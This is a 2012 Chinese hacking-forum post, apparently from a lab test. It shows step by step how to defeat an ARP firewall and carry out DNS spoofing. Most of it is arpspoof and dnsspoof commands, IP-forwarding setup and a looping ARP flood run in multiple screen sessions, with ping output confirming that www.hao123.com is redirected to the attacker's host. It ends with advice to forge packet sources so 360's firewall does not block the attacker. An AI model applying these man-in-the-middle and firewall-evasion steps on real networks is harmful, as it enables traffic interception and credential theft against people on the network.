切换风格

Wizard Sky California Sunset glow Black Cloud Beige Dragon Lavender NewYear City Snow Flowers London
收藏本站XSS平台字符串转换jsfuck
349 DNS SPOOF 简单突破 ARP防火墙[复制链接]
发表于 2012-11-8 01:46:49 | 显示全部楼层 |!read_mode!
TEST;google 彩影ARP防火墙单机版下载
RE:
http://www.3g-sec.com/thread-305-1-1.html

测试DNS欺骗
网关 5.5.5.2
目标 5.5.5.4
终端1


  1. root@Dis9Team:~# arpspoof 5.5.5.2 -t 5.5.5.5
复制代码
终端2
  1. root@Dis9Team:~# arpspoof 5.5.5.5 -t 5.5.5.2
复制代码
开启转发
  1. root@Dis9Team:~# echo 1 > /proc/sys/net/ipv4/ip_forward
复制代码
发现ARP防火墙有动静


先不管 先欺骗DNS试试


  1. root@Dis9Team:~# cat baidu
  2. 5.5.5.4 www.hao123.com
  3. root@Dis9Team:~# dnsspoof -f baidu host 5.5.5.5 and udp  port 53
复制代码


5.5.5.4是本机 APACHE 默认

WIN PING一下

  1. C:\Documents and Settings\Administrator>ping www.hao123.com

  2. Pinging hao123.n.shifen.com [61.135.185.29] with 32 bytes of data:

  3. Reply from 61.135.185.29: bytes=32 time=210ms TTL=128
复制代码

没欺骗成功
咱们来不停的发包..

  1. root@Dis9Team:~# cat send
  2. arpspoof 5.5.5.5 -t 5.5.5.2
  3. arpspoof 5.5.5.2 -t 5.5.5.5
  4. root@Dis9Team:~# screen ./send

  5. [1]+  Stopped                 screen ./send
  6. root@Dis9Team:~# screen ./send

  7. [2]+  Stopped                 screen ./send
  8. root@Dis9Team:~# screen ./send

  9. [3]+  Stopped                 screen ./send
  10. root@Dis9Team:~# screen ./send

  11. [4]+  Stopped                 screen ./send
  12. 等等
复制代码

查看进程


  1. root@Dis9Team:~# screen -ls
  2. There are screens on:
  3.         3754.pts-7.Dis9Team        (11/01/2012 12:21:47 AM)        (Detached)
  4.         3750.pts-7.Dis9Team        (11/01/2012 12:21:46 AM)        (Detached)
  5.         3746.pts-7.Dis9Team        (11/01/2012 12:21:44 AM)        (Detached)
  6.         3742.pts-7.Dis9Team        (11/01/2012 12:21:41 AM)        (Detached)
  7.         3722.pts-4.Dis9Team        (11/01/2012 12:21:21 AM)        (Attached)
  8.         3713.pts-4.Dis9Team        (11/01/2012 12:21:08 AM)        (Detached)
  9. 6 Sockets in /var/run/screen/S-root.

  10. root@Dis9Team:~#
复制代码

PING测试


  1. C:\Documents and Settings\Administrator>ping www.hao123.com

  2. Pinging www.hao123.com [5.5.5.4] with 32 bytes of data:

  3. Reply from 5.5.5.4: bytes=32 time<1ms TTL=64
  4. Reply from 5.5.5.4: bytes=32 time<1ms TTL=64

  5. Ping statistics for 5.5.5.4:
  6.     Packets: Sent = 2, Received = 2, Lost = 0 (0% loss),
  7. Approximate round trip times in milli-seconds:
  8.     Minimum = 0ms, Maximum = 0ms, Average = 0ms
  9. Control-C
  10. ^C
  11. C:\Documents and Settings\Administrator>
复制代码

对于360
对于360伪造发包源就行
不然会吧发包IP封了






附件: 你需要登录才可以下载或查看附件。没有帐号?加入Team
操千曲而后晓声,观千剑而后识器。

代码区

GMT+8, 2020-12-6 10:06

Powered by Discuz! X2

© 2001-2018 Comsenz Inc.

回顶部